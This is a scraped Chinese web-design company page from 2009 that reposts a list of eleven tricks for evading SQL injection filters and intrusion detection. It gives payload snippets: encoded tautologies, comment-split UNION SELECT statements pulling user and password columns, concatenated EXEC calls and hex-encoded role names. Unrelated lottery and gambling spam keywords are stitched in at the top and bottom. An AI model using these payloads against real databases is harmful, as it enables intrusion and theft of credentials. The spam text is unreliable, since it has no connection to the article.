苹果部落冲突更换绑定
青海網站建設、網絡推廣最好的公司--您身邊的網站建設專家,馬上拿起電話,聯系我們:0971-8235355   
青海西寧網站建設、網站制作公司-西寧威勢電子信息服務有限公司 首頁 |  公司簡介 |  網站建設 |  網絡推廣 |  空間租用 |  域名注冊 |  企業郵局 |  網絡安全 |  網站編程 |  客服中心 |  聯系我們 |  人才招聘
 
西寧威勢最新網站制做案例展示
Lastest Project
 
西寧網站建設  
當前位置為:首頁 >> 腳本安全 >> 正文  
繞過防注入的11招,效果很不錯。

文章來源: 西寧威勢電子信息服務有限公司     發布時間:2009-8-5    瀏覽次數:2322   

1、運用編碼技術繞過
如URLEncode編碼,ASCII編碼繞過。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以為CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

2、通過空格繞過
如兩個空格代替一個空格,用Tab代替空格等,或者刪除所有空格,如
or' swords' =‘swords',由于mssql的松散性,我們可以把or 'swords' 之間的空格去掉,并不影響運行。

3、運用字符串判斷代替
用經典的or 1=1判斷繞過,如or 'swords' ='swords',這個方法就是網上在討論的。

4、通過類型轉換修飾符N繞過
可以說這是一個不錯的想法,他除了能在某種程度上繞過限制,而且還有別的作用,大家自己好好想想吧。關于利用,如or 'swords' = N' swords' ,大寫的N告訴mssql server 字符串作為nvarchar類型,它起到類型轉換的作用,并不影響注射語句本身,但是可以避過基于知識的模式匹配IDS。

5、通過+號拆解字符串繞過
效果值得考證,但畢竟是一種方法。如or 'swords' =‘sw' +' ords' ;EXEC(‘IN' +' SERT INTO '+' …..' )

6、通過LIKE繞過
以前怎么就沒想到呢?如or'swords' LIKE 'sw'!!!顯然可以很輕松的繞過“=”“>”的限制……

7、通過IN繞過
與上面的LIKE的思路差不多,如or 'swords' IN ('swords')


8、通過BETWEEN繞過
如or 'swords' BETWEEN 'rw' AND 'tw'

9、通過>或者<繞過
or 'swords' > 'sw'
or 'swords' < 'tw'
or 1<3
……

10、運用注釋語句繞過
用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感詞,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser

11、用HEX繞過,一般的IDS都無法檢測出來
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)

上一篇:常見的一句話木馬
下一篇:收集一些常見的webshell后門的特征碼
評論列表
正在加載評論……
  
評論   
呢  稱:
驗證碼: 若看不清請點擊更換!
內  容:
 
 
  在線洽談咨詢:
點擊這里,在線洽談   點擊這里,在線洽談   點擊這里,在線洽談
與我交談  與我交談 與我交談
乘車路線    匯款方式   加盟合作  人才招聘  
公司地址:青海省西寧市西關大街73號(三二四部隊招行所四樓)     青ICP備13000578號-1 公安機關備案號:63010402000123    
QQ:147399120    mail:[email protected]    電話: 13897410341    郵編:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版權所有:西寧威勢電子信息服務有限公司 未經書面制授權,請勿隨意轉載!
業務:青海網站制做青海網站建設青海網頁設計西寧網站制做西寧網站建設青海域名注冊青海網絡推廣青海網站推廣青海空間租用青海軟件開發網站安全網絡安全

苹果部落冲突更换绑定 内蒙古时时昨天结果查询 山东十一选五及时开奖 赛车pk10加盟方式 福建十一选五专家推荐预测 重庆时时彩人工稳计划 3d开奖直播 腾讯3分彩百科 乐天休闲棋牌平台 内蒙古11选5历史开奖图 pk10怎样玩能赢钱